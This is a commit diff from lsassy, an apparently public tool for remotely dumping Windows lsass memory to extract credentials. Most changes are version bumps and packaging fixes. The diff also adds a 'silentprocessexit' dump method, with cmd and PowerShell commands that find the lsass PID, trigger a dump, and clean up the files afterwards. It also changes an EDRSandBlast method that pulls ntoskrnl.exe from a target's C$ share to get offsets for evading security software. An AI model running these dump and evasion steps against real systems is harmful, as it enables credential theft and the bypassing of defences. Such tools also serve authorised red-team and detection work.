Commit run/0cef3469-1915-42c7-8faf-124fbf38113d/upstream - python-lsassy

+7

-7

Makefile less more

7	7	find . -name '__pycache__' -exec rm -rf {} +
8	8
9	9	publish: clean
10		python3.7 setup.py sdist bdist_wheel
11		python3.7 -m twine upload dist/*
	10	python setup.py sdist bdist_wheel
	11	python -m twine upload dist/*
12	12
13	13	testpublish: clean
14		python3.7 setup.py sdist bdist_wheel
15		python3.7 -m twine upload --repository-url https://test.pypi.org/legacy/ dist/*
	14	python setup.py sdist bdist_wheel
	15	python -m twine upload --repository-url https://test.pypi.org/legacy/ dist/*
16	16
17	17	linux: clean
18	18	python setup.py install

23	23	pyinstaller ./lsassy/console.py --onefile --clean -n lsassy_windows_amd64 --additional-hooks-dir=hooks
24	24
25	25	rebuild: clean
26		python3.7 setup.py install
	26	python setup.py install
27	27
28	28	build: clean
29		python3.7 setup.py install
	29	python setup.py install
30	30
31	31	install: build
32	32
33	33	test:
34		python3.7 setup.py test
	34	python setup.py test

+3

-1

README.md less more

0	0	# lsassy
1	1
2		[![PyPI version](https://d25lcipzij17d.cloudfront.net/badge.svg?id=py&type=6&v=3.1.3&x2=0)](https://pypi.org/project/lsassy/)
	2	[![PyPI version](https://d25lcipzij17d.cloudfront.net/badge.svg?id=py&type=6&v=3.1.6&x2=0)](https://pypi.org/project/lsassy/)
3	3	[![PyPI Statistics](https://img.shields.io/pypi/dm/lsassy.svg)](https://pypistats.org/packages/lsassy)
4	4	[![Tests](https://github.com/hackndo/lsassy/workflows/Tests/badge.svg)](https://github.com/hackndo/lsassy/actions?workflow=Tests)
5	5	[![Twitter](https://img.shields.io/twitter/follow/hackanddo?label=HackAndDo&style=social)](https://twitter.com/intent/follow?screen_name=hackanddo)

150	150	* EDRSandBlast
151	151	* nanodump
152	152	* rdrleakdiag
	153	* silentprocessexit
153	154	* sqldumper
154	155
155	156	#### comsvcs method

482	483	* [s4ntiago_p](https://twitter.com/s4ntiago_p) for [nanodump](https://github.com/helpsystems/nanodump)
483	484	* [0gtweet](https://twitter.com/0gtweet) for [Rdrleakdiag technique](https://twitter.com/0gtweet/status/1299071304805560321)
484	485	* [Luis Rocha](https://twitter.com/countuponsec) for [SQLDumper technique](https://twitter.com/countuponsec/status/910969424215232518)
	486	* [Asaf Gilboa](https://mobile.twitter.com/asaf_gilboa) for [LsassSilentProcessExit technique](https://github.com/deepinstinct/LsassSilentProcessExit)
485	487
486	488	## Official Discord Channel
487	489

+1

-1

lsassy/__init__.py less more

0		__version__ = '3.1.3'
	0	__version__ = '3.1.6'

+3

-3

lsassy/console.py less more

29	29	help='Dump module options (Example procdump_path=/opt/procdump.exe,procdump=procdump.exe')
30	30	group_dump.add_argument('--timeout', action='store', type=int, default=5,
31	31	help='Max time to wait for lsass dump (Default 5s)')
32		group_dump.add_argument('--time-between-commands', action='store', type=int, default=7,
33		help='Time to wait between dump methods commands (Default 7s)')
	32	group_dump.add_argument('--time-between-commands', action='store', type=int, default=1,
	33	help='Time to wait between dump methods commands (Default 1s)')
34	34	group_dump.add_argument('--parse-only', action='store_true', help='Parse dump without dumping')
35		group_dump.add_argument('--keep-dump', action='store_true', help='Parse dump without dumping')
	35	group_dump.add_argument('--keep-dump', action='store_true', help='Do not delete lsass dump on remote host')
36	36
37	37	group_auth = parser.add_argument_group('authentication')
38	38	group_auth.add_argument('-u', '--username', action='store', help='Username')

+5

-0

lsassy/dumpmethod/comsvcs_stealth.py less more

11	11
12	12	def __init__(self, session, timeout, time_between_commands):
13	13	super().__init__(session, timeout, time_between_commands)
	14
	15	# If default, set to 7. Otherwise, keep custom time
	16	if self._time_between_commands == 1:
	17	self._time_between_commands = 7
	18
14	19	self.comsvcs_copied = False
15	20	self.comsvcs_copy_name = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(8)) + ".dll"
16	21	self.comsvcs_copy_path = "\\Windows\\Temp\\"

+12

-4

lsassy/dumpmethod/edrsandblast.py less more

20	20	self.tmp_ntoskrnl = "lsassy_" + ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(32)) + ".exe"
21	21
22	22	def prepare(self, options):
23		with open('/tmp/{}'.format(self.tmp_ntoskrnl), 'wb') as p:
	23	if os.name == 'nt':
	24	tmp_dir = 'C:\\Windows\\Temp\\'
	25	else:
	26	tmp_dir = '/tmp/'
	27	with open('{}{}'.format(tmp_dir, self.tmp_ntoskrnl), 'wb') as p:
24	28	try:
25	29	self._session.smb_session.getFile("C$", "\\Windows\\System32\\ntoskrnl.exe", p.write)
26		logging.success("ntoskrnl.exe downloaded to /tmp/{}".format(self.tmp_ntoskrnl))
	30	logging.success("ntoskrnl.exe downloaded to {}{}".format(tmp_dir, self.tmp_ntoskrnl))
27	31	except Exception as e:
28	32	logging.error("ntoskrnl.exe download error", exc_info=True)
	33	try:
	34	os.remove('{}{}'.format(tmp_dir, self.tmp_ntoskrnl))
	35	except Exception as e:
	36	return None
29	37	return None
30		self.ntoskrnl.content = self.get_offsets("/tmp/{}".format(self.tmp_ntoskrnl))
	38	self.ntoskrnl.content = self.get_offsets("{}{}".format(tmp_dir, self.tmp_ntoskrnl))
31	39
32	40	if self.ntoskrnl.content is not None:
33	41	logging.success("ntoskrnl offsets extracted")
34	42	logging.debug(self.ntoskrnl.content.split("\n")[1])
35		os.remove('/tmp/{}'.format(self.tmp_ntoskrnl))
	43	os.remove('{}{}'.format(tmp_dir, self.tmp_ntoskrnl))
36	44
37	45	return self.prepare_dependencies(options, [self.edrsandblast, self.RTCore64, self.ntoskrnl])
38	46

+35

-0

lsassy/dumpmethod/silentprocessexit.py less more

	0	from lsassy.dumpmethod import IDumpMethod, Dependency
	1
	2
	3	class DumpMethod(IDumpMethod):
	4	#need_debug_privilege = True
	5
	6
	7	def __init__(self, session, timeout, time_between_commands):
	8	super().__init__(session, timeout, time_between_commands)
	9	self.silentprocessexit = Dependency("silentprocessexit", "silentprocessexit.exe")
	10
	11	def prepare(self, options):
	12	return self.prepare_dependencies(options, [self.silentprocessexit])
	13
	14	def clean(self):
	15	self.clean_dependencies([self.silentprocessexit])
	16
	17	def get_commands(self, dump_path=None, dump_name=None, no_powershell=False):
	18	cmd_command = [
	19	"""for /f "tokens=2 delims= " %J in ('"tasklist /fi "Imagename eq lsass.exe" \| find "lsass""') do {} %J 0""".format(
	20	self.silentprocessexit.get_remote_path()
	21	),
	22	"""move C:\\temp\\lsass.exe-(PID-* C:\\Temp\\lsass && move C:\\Temp\\lsass\\lsass.exe*.dmp {}{} """.format(self.dump_path, self.dump_name),
	23	"""del /s /q "C:\\temp\\lsass" && rmdir C:\\Temp\\lsass"""
	24	]
	25	pwsh_command = [
	26	"{} (Get-Process lsass).Id 0".format(
	27	self.silentprocessexit.get_remote_path()
	28	),
	29	"""move C:\\temp\\lsass.exe-(PID-* C:\\Temp\\lsass && move C:\\Temp\\lsass\\lsass.exe*.dmp {}{} """.format(self.dump_path, self.dump_name),
	30	"""del /s /q "C:\\temp\\lsass" && rmdir C:\\Temp\\lsass""" ]
	31	return {
	32	"cmd": cmd_command,
	33	"pwsh": pwsh_command
	34	}

+3

-0

lsassy/logger.py less more

58	58	"""
59	59	StreamHandler and formatter added to root logger
60	60	"""
	61	if (logging.getLogger().hasHandlers()):
	62	logging.getLogger().handlers.clear()
	63
61	64	handler = logging.StreamHandler(sys.stdout)
62	65	handler.setFormatter(LsassyFormatter(no_color))
63	66	logging.getLogger().addHandler(handler)

+2

-2

pyproject.toml less more

0	0	[tool.poetry]
1	1	name = "lsassy"
2		version = "3.1.3"
	2	version = "3.1.6"
3	3	description = "Tool to remotely extract credentials"
4	4	readme = "README.md"
5	5	homepage = "https://github.com/hackndo/lsassy"

10	10	[tool.poetry.dependencies]
11	11	python = "^3.7"
12	12	netaddr = "^0.8.0"
13		pypykatz = "^0.4.8"
	13	pypykatz = "^0.6.2"
14	14	impacket = "^0.9.22"
15	15	rich = "^10.6.0"
16	16

+2

-2

requirements.txt less more

+2

-2

setup.py less more

12	12
13	13	setup(
14	14	name="lsassy",
15		version="3.1.3",
	15	version="3.1.6",
16	16	author="Pixis",
17	17	author_email="[email protected]",
18	18	description="Python library to extract credentials from lsass remotely",

26	26	install_requires=[
27	27	'impacket',
28	28	'netaddr',
29		'pypykatz>=0.4.8',
	29	'pypykatz>=0.6.2',
30	30	'rich'
31	31	],
32	32	python_requires='>=3.6',

+1

-1

tests/test_lsassy.py less more